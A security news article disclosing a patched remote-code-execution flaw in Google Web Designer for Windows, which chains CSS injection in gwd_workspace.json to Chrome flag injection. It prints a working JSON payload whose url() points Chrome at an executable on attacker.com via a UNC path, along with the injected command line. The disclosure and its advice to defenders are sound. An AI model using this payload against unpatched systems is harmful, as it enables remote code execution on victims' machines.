By abusing CSS injection in the document configuration file, attackers can execute arbitrary commands on a victim’s machine via Chrome’s internal API.
Google Web Designer stores custom color palettes in gwd_workspace.json, under the color.customColorPalettes array.
Solid colors are parsed safely into RGBA components, but gradient definitions bypass strict sanitization. An attacker can insert arbitrary CSS rules into the css field:
json"color.customColorPalettes": [
{
"name": "evilSwatch",
"color_data": [
{
"css": "-webkit-linear-gradient;background:url('//ninja-shell/api/browser?method=open&usedefaultapp=false&browser=chrome&url=//%22%20--browser-subprocess-path%3D%5C%5Cattacker.com%5Cpayload.exe%20--headless%20%22')"
}
]
}
]
When the Swatches UI is rendered, this injection triggers a request to the internal ninja-shell API, which bridges the JavaScript application shell to native OS operations.
Google Web Designer leverages a REST API at //ninja-shell/api/browser to open URLs in Chrome:
textGET //ninja-shell/api/browser?method=open
&usedefaultapp=false
&browser=chrome
&url=https%3A%2F%2Faccounts.google.com%2F...
Because the url parameter is not properly escaped, an attacker can break out of the quoted argument and append additional flags.
For example, injecting %22 --browser-subprocess-path=%5C%5Cbalintmagyar.com%5Cpayload.exe --headless %22 causes Chrome to launch with:
textchrome.exe "//" --browser-subprocess-path=\balintmagyar.compayload.exe --headless ""
By hosting payload.exe On a WebDAV server and referencing it via a UNC path, Windows will fetch and execute the payload transparently, achieving full RCE when a user clicks the custom swatch.
This vulnerability (CWE-78) affects Google Web Designer for Windows builds before 16.4.0.0711 (released July 29, 2025).
macOS and Linux versions are not exploitable due to differing subprocess handling.
A successful attack requires minimal user interaction: opening a malicious ad document and selecting the Swatches option in the color picker.
Google’s Vulnerability Reward Program awarded $3,500 for this submission. Users should update to version 16.4.0.0711 or later, which enforces strict sanitization of gradient definitions and properly escapes command-line arguments for the internal API.
Security teams are advised to audit any custom gwd_workspace.json files for unexpected url() or gradient rules and to restrict network file share access where possible.
With this discovery, Magyar highlights the latent risks of intermixing native and web components in modern applications.
While CSS injection rarely escalates to code execution, this chain of vulnerabilities underscores the importance of rigorous input validation and sandboxing of internal APIs.
Continuous review of third-party tools remains essential to maintaining a secure development and publishing pipeline.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Google Web Designer Vulnerability Could Let Hackers Take Control of PCs appeared first on Cyber Security News.
Allie Phillips, one of the plaintiffs suing the state of Tennessee over its abortion bans,…
A critical scope overreach vulnerability was recently identified in the Microsoft Entra Agent Identity Platform.…
A critical scope overreach vulnerability was recently identified in the Microsoft Entra Agent Identity Platform.…
Today's links A free, open visual identity for enshittification: No mere poop emoji! Hey look…
Will design, manufacture and sell refrigeration and laundry By Alan Wolf, YSN Swedish appliance giant…
A year after most robots failed to finish the Beijing race, nearly half the field…
This website uses cookies.